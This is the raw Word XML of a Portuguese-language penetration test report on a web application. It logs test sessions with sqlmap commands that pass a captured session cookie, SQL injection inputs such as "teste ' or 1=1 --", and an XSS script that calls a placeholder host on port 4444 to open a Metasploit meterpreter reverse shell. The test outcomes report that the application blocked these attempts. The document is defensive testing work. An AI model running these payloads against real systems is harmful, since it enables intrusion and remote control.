          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>: sqlmap -r params -p cadastr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params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lastRenderedPageBreak/>
        <w:t xml:space="preserve">“cadastro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D975CE" w:rsidRDefault="00D975CE" w:rsidP="00D975CE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975CE" w:rsidRPr="003A39F6" w:rsidRDefault="00D975CE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  <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> “cadastro”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri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0536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D975CE">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> cadastro” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 20.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="005A5292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2686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5A529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1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7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s anteriores </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>para incluir o par</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>â</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">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ok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O comando “-r” indica ao progr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ama que as instruções do ataque devem ser</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> carregadas no arquivo </w:t>
      </w:r>
      <w:r w:rsidRPr="00DB70B5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n</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>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ok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01063" w:rsidP="0010106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</w:p>
    <w:p w:rsidR="00101063" w:rsidRDefault="00101063" w:rsidP="0010106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“ok”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRPr="003A39F6" w:rsidRDefault="00101063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DB70B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101063">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">“ok” </w:t>
      </w:r>
      <w:r w:rsidRPr="00594AD8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>escolhido para teste de injeção SQL não é injetável conforme mostra a figura 21.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6" w:rsidRDefault="00236FDF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82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B70B5" w:rsidRDefault="005A529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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00DB70B5">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Resultado exploração Sql Injection via Sqlmap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6635A8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3.5 </w:t>
      </w:r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Tela Consulta Servidor -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dia 18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1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</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 4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A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Submeter entradas maliciosas no sistema através de injeção de códigos SQL</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> na página de Consulta Servidor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1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lastRenderedPageBreak/>
        <w:t xml:space="preserve">Verificar se o campo </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="006635A8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 xml:space="preserve"> é vulnerável à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01063" w:rsidRP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34569" w:rsidRDefault="00101063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</w:t>
      </w:r>
      <w:r w:rsidR="008C6D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:</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 1000’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r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>“</w:t>
      </w:r>
      <w:r w:rsidRPr="00934569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>”</w:t>
      </w:r>
      <w:r w:rsidRPr="00985A8F"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como entrada no campo “</w:t>
      </w:r>
      <w:r w:rsidRPr="0063700A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 xml:space="preserve">”, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao siape de usuários cadastrados. Comentários inline foram utilizados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o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserido.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00101063" w:rsidRDefault="00101063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01063" w:rsidRP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01063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-se que o sistema realize o tratamento para impedir que os comentários sejam interpretados como parte da consulta.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00101063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s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#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 --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, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrad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84E80" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC7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Tela Consulta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</w:t>
      </w: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>Exploração via Sqlmap</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00384E80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nos dias 19, 20 e 22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3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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> e 3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Utilizar a ferramenta S</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>qlma</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>p para automatizar o processo de detecção de vulnerabilidades na tela de Consulta Servidor a partir de injeção de códigos SQL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Verificar se a tela </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Consulta Servidor é vulnerável a injeção de código SQL e caso haja vulnerabilidade conseguir obter o nome do banco de dados utilizado pelo sistem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Para realizar essa </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> foi necessário utilizar a ferramenta Burp Suite para capturar as informações de cookie contidas no cabeçalho HTTP de uma requisição no momento em que a página d</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>e</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> Consulta Servidor é acessad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A2041" w:rsidRDefault="009A2041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06019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3</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> - Parâ</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>metros obtidos através do Burp Suite</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">.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--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db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“--cookie” especifica </w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">um cookie de sessão válido a ser passado para o </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sqlmap</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> durante o ataque.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7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lastRenderedPageBreak/>
        <w:t>“--current -db”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> comando</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1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</w:p>
    <w:p w:rsidR="00D65D65" w:rsidRPr="00D65D65" w:rsidRDefault="00D65D65" w:rsidP="00D65D6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FF1C9C" w:rsidRDefault="00D65D6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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se que a tela de Consulta servidor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 </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">seja </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>possível descobrir o nome do banco de dados utilizado pela aplicaçã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noProof/>
          <w:lang w:eastAsia="pt-BR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ste. Não possível encontr</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">ar vulnerabilidade na página e </w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> As figuras 23 e 24 mostram os resultados do Sqlmap.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRDefault="00022ED2" w:rsidP="00022ED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1C4F4D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44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4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1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</w:p>
    <w:p w:rsidR="00F04EFF" w:rsidRDefault="00F04EFF" w:rsidP="001C4F4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28615" cy="4064635"/>
            <wp:effectExtent l="0" t="0" r="63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5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2.</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7"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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">Repetir a ação da </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 2 e aumentar o nível de heurística </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>aplicada pelo Sqlmap na injeção de SQL para o valor máximo: 5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3A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>--cookie="PHSESSID=75ce718b37088517cafla733d53c60f" --current -db  --level 5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 utilizado</w:t>
      </w:r>
      <w:r w:rsidRPr="00FF1C9C">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> 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>evel 5” comando utilizado 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473CA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473CA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473CA" w:rsidRPr="006473CA" w:rsidRDefault="006473CA" w:rsidP="006473CA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lastRenderedPageBreak/>
        <w:t>Resultados esperados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6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</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>-se que a tela Consulta Servidor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possível descobrir o nome do banco de dados utilizado pela aplicaçã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</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>ste. Mesmo aumentando o nível da</w:t>
      </w:r>
      <w:r w:rsidRPr="003A39F6">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> heurística utilizada no escaneamento, não possível encontrar vulnerabilidade na página e consequentemente não foi possível descobrir o nome do banco de dados utilizado no sistema.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003A39F6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8"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pP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4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5F6E06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L</w:t>
      </w:r>
      <w:r w:rsidRPr="005F6E06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or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Explorar vulnerabilidade de XSS encontrado na tela Cadastro Lotes de Vacinas na Iteração 3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Resultados</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00751591" w:rsidRDefault="00751591" w:rsidP="00D602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</w:p>
    <w:p w:rsidR="00D602EF" w:rsidRDefault="00D602EF" w:rsidP="00D602EF">
      <w:pPr>
        <w:tabs>
          <w:tab w:val="left" w:pos="3315"/>
        </w:tabs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</w:t>
      </w:r>
      <w:r w:rsidR="00D602EF">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> executados</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>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E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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Através do exploit disponível em </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit/Multi/Handler </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>com o payload windows-meterpreter-reverse_tcp</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:i/>
          <w:iCs/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve">, </w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>usar o Metasploit para abrir um listener na porta 444 da máquina virtual que usa o Kali Linux;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="00E52417" w:rsidRDefault="008C6DC7" w:rsidP="008C6DC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Usar um comando GET de Javascript para abrir a conexão entre a máquina que hospeda a aplicação e a máquina virtual que usa Kali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>Dessa forma, será criado um listener que fica ouvindo conexões. Quando ocorre alguma conexão externa, ele executa o payload carregado no momento, que no caso é o windows/meterpreter/reverse_tcp que abre uma conexão reversa da máquina atacada para a máquina atacan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 w:rsidRPr="00C3730D">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Comando utilizado:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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 w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>&lt;script&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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lastRenderedPageBreak/>
        <w:t xml:space="preserve">r = </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>new</w:t>
      </w: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 xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>XMLHttpRequest</w:t>
      </w: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 xml:space="preserve">(); </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008C6DC7" w:rsidRPr="003E1ACB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>r.open(</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="4A1C21"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>"GET"</w:t>
      </w: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>,’http://IP_do_servidor:4444’,</w:t>
      </w:r>
      <w:r w:rsidRPr="003E1ACB">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>false</w:t>
      </w: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onsolas" w:hAnsi="Consolas" w:cs="Consolas"/>
          <w:color w:val="00008B"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="2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D602EF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D602EF" w:rsidRPr="00101063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602EF" w:rsidRDefault="00D602EF" w:rsidP="00D602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Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Espera-se que a sessão do meterpreter não seja Aberta.</w:t>
      </w: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D602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Passou no teste. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>O navegador bloqueia a requisição</w:t>
      </w:r>
      <w:r w:rsidR="00E77F75">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> usando o filtro de CORS [6</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>]</w:t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Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:noProof/>
          <w:color w:val="000000"/>
          <w:lang w:eastAsia="pt-BR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1464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46E12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6</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – Erro exibido no navegador na execução da requisição usando</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00046E12">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>o filtro de CORS.</w:t>
      </w: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dar o mesmo script utilizado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1 em um navegador diferente, para descobrir se o bloqueio da conexão ocorre em qualquer navegador ou apenas no Iceweasel.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D602EF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602EF" w:rsidRPr="00101063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602EF" w:rsidRPr="00D602EF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sessão do meterpreter não seja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Pr="00650630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sou no teste. </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Ao utilizar o navegador Firefox, o filtro de CORS impede a conex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146431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650630" w:rsidRDefault="009A2041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7</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00650630">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t xml:space="preserve"> – </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:t>Navegador Firefox impede a conexão quando o filtro de CORS é utiliza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A38D8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A38D8">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Tela Cadastro Servidor – Exploração v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6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Cadastro Servidor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846D4" w:rsidRPr="00B846D4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B846D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: teste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 a injeção de instruções SQL através do campo de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2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>Inserir um texto com uma distribuição adequada de aspa simples e comentários inline como entrada no camp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, a fim de modificar a instrução SQL utilizada pelo sistema na consulta de dados referentes ao nome de usuários </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>cadastrados. Comentários inline foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> utilizados para tentar forçar o interpretador de SQL da aplicação a ignorar todas as instruções SQL que vierem após o comentário inserid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teste ‘ or 1=1 --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  <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1  #</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00B846D4" w:rsidRDefault="00B846D4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</w:p>
    <w:p w:rsidR="00B846D4" w:rsidRPr="00101063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B846D4" w:rsidRPr="00906B58" w:rsidRDefault="00B846D4" w:rsidP="00B846D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pera-se que o sistema realize o tratamento dos caracteres para impedir que os comentários inline sejam interpretados como parte da consulta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906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">: Passou no teste. A aplicação realizou o tratamento de dados de entrada, não permitindo a mudança de comportamento da instrução SQL utilizada pelo sistema para consultar os dados dos usuários cadastrados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3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 xml:space="preserve">É possível que a tela utilize Javascript para validar os dados informados pelo usuário do sistema no momento do cadastro. Então, para ignorar as possíveis validações existentes, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">o funcionamento do Javascript foi desabilitado </w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">no browser em utilização. Após isso </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>foram</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> repetidos os procedimentos das </w:t>
      </w:r>
      <w:r w:rsidR="0048383A">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>Sessão de teste</w:t>
      </w:r>
      <w:r w:rsidRPr="00906B58">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">s 1 e 2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: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C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve">teste ‘ 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C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 --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  <w:r w:rsidRPr="00C97F3F">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>teste ‘ or 1=1 #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</w:p>
    <w:p w:rsidR="00B846D4" w:rsidRPr="00B846D4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06B58" w:rsidRDefault="00B846D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Espera-se </w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t>que o sistema</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> realize</w:t>
      </w:r>
      <w:r w:rsidR="008C6DC7" w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
        <w:t xml:space="preserve"> o tratamento de todos os caracteres informados como parâmetros regulares da consulta</w:t>
      </w:r>
      <w:r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E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
      <w:r w:rsidR="00B846D4">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> P</w:t>
      </w:r>
      <w:r w:rsidRPr="00E52417">
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:cs="Arial"/>
        </w:rPr>
